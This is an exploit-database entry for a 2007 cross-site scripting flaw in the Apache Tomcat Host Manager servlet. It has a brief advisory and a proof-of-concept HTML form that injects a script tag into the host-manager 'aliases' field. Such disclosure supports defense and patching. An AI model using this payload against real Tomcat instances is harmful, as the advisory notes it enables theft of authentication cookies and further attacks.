Lucene search

K
exploitpackNTT OSS CENTEREXPLOITPACK:187AC1A0A679190F616536E5AD239206
HistoryAug 14, 2007 - 12:00 a.m.

Apache Tomcat 6.0.13 - Host Manager Servlet Cross-Site Scripting

2007-08-1400:00:00
NTT OSS CENTER
8

Apache Tomcat 6.0.13 - Host Manager Servlet Cross-Site Scripting

source: https://www.securityfocus.com/bid/25314/info

Apache Tomcat Host Manager Servlet is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.

An attacker can exploit this vulnerability to inject HTML and script code into the browser of an unsuspecting victim. The attacker may then steal cookie-based authentication credentials and launch other attacks.

Apache Tomcat 5.5.0 through 5.5.24 and 6.0.0 through 6.0.13 are affected. 

<form action="http://localhost:8080/host-manager/html/add" method="get"> <input type="hidden" NAME='name' VALUE="aaa"> <input type="hidden" NAME='aliases' VALUE="<script>alert()</script>"> <input type="submit"> </form>